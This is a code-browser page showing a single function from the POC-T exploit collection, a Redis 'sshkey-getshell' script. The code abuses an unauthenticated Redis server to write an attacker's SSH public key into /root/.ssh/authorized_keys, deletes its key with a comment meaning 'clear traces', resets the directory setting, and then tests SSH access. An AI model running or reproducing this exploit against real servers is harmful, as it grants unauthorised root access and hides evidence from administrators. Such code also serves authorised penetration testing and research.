MCPcopy
hub / github.com/Xyntax/POC-T / poc

Function poc

script/redis-sshkey-getshell.py:29–50  ·  view source on GitHub ↗
(url)

Source from the content-addressed store, hash-verified

27
28
29def poc(url):
30 url = host2IP(url)
31 ip = url.split(':')[0]
32 port = int(url.split(':')[-1]) if ':' in url else 6379
33 try:
34 if not checkPortTcp(ip, 22):
35 return False
36 r = redis.Redis(host=ip, port=port, db=0)
37 if 'redis_version' in r.info():
38 key = randomString(10)
39 r.set(key, '\n\n' + public_key + '\n\n')
40 r.config_set('dir', '/root/.ssh')
41 r.config_set('dbfilename', 'authorized_keys')
42 r.save()
43 r.delete(key) # 清除痕迹
44 r.config_set('dir', '/tmp')
45 time.sleep(5)
46 if testConnect(ip, 22):
47 return True
48 except Exception:
49 return False
50 return False
51
52
53def testConnect(ip, port=22):

Callers

nothing calls this directly

Calls 8

host2IPFunction · 0.90
checkPortTcpFunction · 0.90
randomStringFunction · 0.90
testConnectFunction · 0.85
splitMethod · 0.80
infoMethod · 0.80
setMethod · 0.80
deleteMethod · 0.80

Tested by

no test coverage detected